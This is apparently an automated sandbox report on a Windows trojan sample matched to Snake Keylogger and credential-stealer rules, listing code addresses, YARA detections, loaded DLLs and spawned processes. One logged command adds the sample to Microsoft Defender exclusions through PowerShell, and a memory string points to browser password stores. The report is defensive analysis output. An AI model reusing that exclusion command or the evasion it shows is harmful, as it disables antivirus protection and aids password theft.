Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBE6B0	5_2_06DBE6B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBE6AF	5_2_06DBE6AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBE6A0	5_2_06DBE6A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB1E70	5_2_06DB1E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBDE00	5_2_06DBDE00
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB178F	5_2_06DB178F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBEF51	5_2_06DBEF51
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBEF60	5_2_06DBEF60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBCCA0	5_2_06DBCCA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBFC5F	5_2_06DBFC5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBFC68	5_2_06DBFC68
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB9C6D	5_2_06DB9C6D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBDDFF	5_2_06DBDDFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBDDF1	5_2_06DBDDF1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBD550	5_2_06DBD550
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBD540	5_2_06DBD540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBEAF8	5_2_06DBEAF8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBE258	5_2_06DBE258
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBE249	5_2_06DBE249
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB8B90	5_2_06DB8B90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBF3B8	5_2_06DBF3B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBEB08	5_2_06DBEB08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB9328	5_2_06DB9328
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB0B20	5_2_06DB0B20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBD0F8	5_2_06DBD0F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB0040	5_2_06DB0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB5018	5_2_06DB5018
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBF810	5_2_06DBF810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBF801	5_2_06DBF801
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB0007	5_2_06DB0007
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBD999	5_2_06DBD999
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DBD9A8	5_2_06DBD9A8

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000000.1368461461.00000000001DC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVZLk.exe6 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1394403952.00000000093A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1378332378.00000000005FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849294560.0000000001187000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Binary or memory string: OriginalFilenameVZLk.exe6 vs SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, K7v8N7oaxfulbm8glp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, K7v8N7oaxfulbm8glp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@4/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqruusq.dbt.ps1

Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000346D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000345D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000347B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000034AD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
